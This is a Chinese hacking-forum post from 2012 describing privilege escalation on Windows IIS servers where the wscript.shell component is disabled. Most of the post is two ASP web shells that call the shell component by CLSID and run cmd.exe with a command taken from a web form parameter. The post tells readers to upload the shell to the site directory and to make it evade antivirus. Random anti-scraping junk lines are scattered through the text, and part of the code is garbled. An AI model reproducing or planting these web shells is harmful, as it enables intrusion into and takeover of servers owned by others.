中国网络渗透测试联盟
标题:
没有wscript.shell组件提权方法
[打印本页]
作者:
admin
时间:
2012-10-21 09:08
标题:
没有wscript.shell组件提权方法
可能有很多人,看到关闭了wscript.shell,就感觉没提权的希望了。就会放弃。
6 r0 R2 W1 h2 Z
一般当闭上面组件时,你上传cmd.exe到上面去是运行不了命令的。运行时会说出错。
8 Q' E2 G; K9 x# U
要想让运行命令可以试试这种方法,成功率为五五之数。
4 J! u" G: o- y/ ~ e
把下面代码复制:
& F3 ]1 j6 e: f( c/ v0 n( J
<%
$ b2 u, N; e( \( ~% j) b
end if
) q; r( D, E8 c4 D
response.write(”")
5 v( H; D- D: j$ t
On Error Resume
1 U' z' T, a2 w5 E& e& F, {
Next
% h( E) q U) X2 c9 }
response.write oScriptlhn.exec(”cmd.exe /c” &
" x5 N9 g# D( X
request(”c”)).stdout.readall
2 @4 A; z; n" [' c6 R
response.write(”")
3 p* ?- [4 B: V; E8 T2 X" X
response.write(”")
1 M+ v5 h) [3 q
response.write(”
% @ R: n/ v& W7 r( }. j7 D
“)
; H+ l7 y( R! n1 F
response.write(”")
8 z! Z+ i3 A) R
%>
, p: y9 P! a* c# N, w
保存为一个asp文件,然后传到网站目录上去
) m( n# F! L% U, R j. _
运行的时候可能会出现两个问题,第一是运行了为什么运行不了命令,这个你可以试着再上传个cmd.exe然后把路径写入上面代码。
8 e( k+ W( C7 n* I9 e* D7 y) |' T
我用此成功运行过cacls命令。
6 b$ P" i! W3 a$ A: @' y) {+ ]
第二那就是运行时出错,可能限制某些代码执行
7 l8 ^5 j' y7 i8 ?2 K
无wscript.shell组件提权又一个方法
6 p. b, }% ?4 v2 U5 n Q9 c
<object runat=server id=oScriptlhn scope=page
7 X8 p: @5 }0 c, U0 X) X' Q
0 \3 p! t! w2 }) N1 q1 ]
classid=”clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8″></object>
% E8 ?% T U R& Y( V% U3 B8 j+ [! R8 }# a
<%if err then%>
" q' X! G' v% H2 f7 \' f$ y0 ~+ U
<object runat=server id=oScriptlhn scope=page
( r. d) u- \9 A) Z
1 d0 g9 N/ l1 N4 `! r
classid=”clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B”></object>
, s* z/ _. X+ x! P' G
<%
, f! K+ A) G: B2 @$ y% g
end if
4 R7 r: q! c1 e/ N; e. v! U9 H
response.write(”<textarea readonly cols=80
( B( Y3 N" k2 x; Y I R
: ]) J7 F. z5 g$ I) ?% g% _" n
rows=20>”)
, ?) _' |5 y: S: E1 d# C# D: V
On Error Resume Next
( ?5 x V* h4 e% x6 ?; p9 p }
response.write
2 T. g' [: V( E0 T v
/ H) I/ G0 f0 f2 Q w
oScriptlhn.exec(”cmd.exe /c” & request(”c”)).stdout.readall
( ~+ r/ d' f* h' A1 P
response.write(”</textarea>”)
! j$ N2 d8 }' r
response.write(”<form
& L) h7 V0 c: y/ a" x9 s# m
' Y5 k9 c3 T; W1 @/ K/ V3 @
method=’post’>”)
) _+ w& U0 Q+ K$ ]& _, L: C
response.write(”<input type=text name=’c'
8 ^' ]6 I2 a X. d% S
8 t* y/ K5 u3 |& U$ r* l
size=60><br>”)
% Y0 O# i9 @( w5 L! J
response.write(”<input type=submit
/ s9 u; z( O: |% T2 `6 Z% o
) v/ b% L& }" L |9 B6 T# I1 j
value=’执行’></form>”)
3 V* Z2 e% q+ W5 V
%>
" v) k. E4 o( \+ t
保存为ASP,此代码可能被杀,请注意免杀。
, V: E& m) c4 s# k
原理:有些人把wscript.shell改名了,但是clsid没有变,所以调用这个clsid就等于调用ws组建
# K( k2 u; Z# j9 D; I2 b6 B
复制代码
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2